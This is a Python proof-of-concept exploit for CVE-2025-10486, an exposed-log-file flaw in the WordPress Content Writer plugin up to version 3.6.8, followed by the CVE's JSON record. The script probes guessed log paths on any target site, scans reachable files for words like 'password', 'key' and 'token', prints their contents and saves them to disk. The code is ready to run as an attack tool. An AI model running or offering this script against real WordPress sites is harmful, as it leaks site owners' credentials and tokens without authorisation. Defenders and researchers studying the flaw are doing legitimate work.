CVE-2025-10486

# CVE-2025-10486 PoC - Content Writer Plugin Sensitive Information Exposure # This PoC demonstrates how an unauthenticated attacker can access exposed log files import requests import sys def exploit(target_url): """ Exploit for CVE-2025-10486: Sensitive Information Exposure in WordPress Content Writer Plugin (versions <= 3.6.8) """ # Common log file paths for Content Writer plugin log_paths = [ "/wp-content/plugins/content-writer/logs/debug.log", "/wp-content/plugins/content-writer/logs/error.log", "/wp-content/plugins/content-writer/logs/content-writer.log", "/wp-content/uploads/content-writer-logs/debug.log", "/wp-content/plugins/content-writer/debug.log", "/wp-content/plugins/content-writer/error.log", "/wp-content/plugins/content-writer/lib/logs/debug.log", "/wp-content/plugins/content-writer/lib/logs/error.log", "/wp-content/plugins/content-writer/includes/logs/debug.log", ] print(f"[*] Targeting: {target_url}") print(f"[*] CVE-2025-10486 - Content Writer Plugin Log File Exposure") print("-" * 60) found = False for path in log_paths: url = target_url.rstrip('/') + path try: response = requests.get(url, timeout=10, allow_redirects=False) if response.status_code == 200 and len(response.content) > 0: # Check if response contains log-like content content = response.text.lower() if any(keyword in content for keyword in ['error', 'warning', 'debug', 'log', 'php', 'sql', 'password', 'key', 'token']): print(f"[+] FOUND exposed log file: {url}") print(f"[+] Status: {response.status_code}") print(f"[+] Content-Length: {len(response.content)} bytes") print(f"[+] First 500 chars of content:") print("-" * 40) print(response.text[:500]) print("-" * 40) found = True # Save full log content filename = path.split('/')[-1] with open(f"exposed_{filename}", 'w') as f: f.write(response.text) print(f"[+] Full content saved to: exposed_{filename}") except requests.exceptions.RequestException as e: pass if not found: print("[-] No exposed log files found at common paths.") print("[*] Try directory brute-forcing or check plugin documentation.") return found if __name__ == "__main__": if len(sys.argv) != 2: print(f"Usage: python3 {sys.argv[0]} <target_url>") print(f"Example: python3 {sys.argv[0]} https://target-wordpress-site.com") sys.exit(1) target = sys.argv[1] exploit(target)

{"cve": {"id": "CVE-2025-10486", "sourceIdentifier": "[email protected]", "published": "2025-10-15T09:15:40.547", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The Content Writer plugin for WordPress is vulnerable to Sensitive Information Exposure in all versions up to, and including, 3.6.8 through publicly exposed log files. This makes it possible for unauthenticated attackers to view potentially sensitive information contained in the exposed log files."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-532"}]}], "references": [{"url": "https://plugins.svn.wordpress.org/content-writer/tags/3.6.8/lib/sc_functions.php", "source": "[email protected]"}, {"url": "https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3379612%40content-writer&new=3379612%40content-writer&sfp_email=&sfph_mail=", "source": "[email protected]"}, {"url": "https://wordpress.org/plugins/content-writer/", "source": "[email protected]"}, {"url": "https://www.wordfence.com/threat-intel/vulnerabilities/id/bb20452b-7049-4567-8288-6d24350e2143?source=cve", "source": "[email protected]"}]}}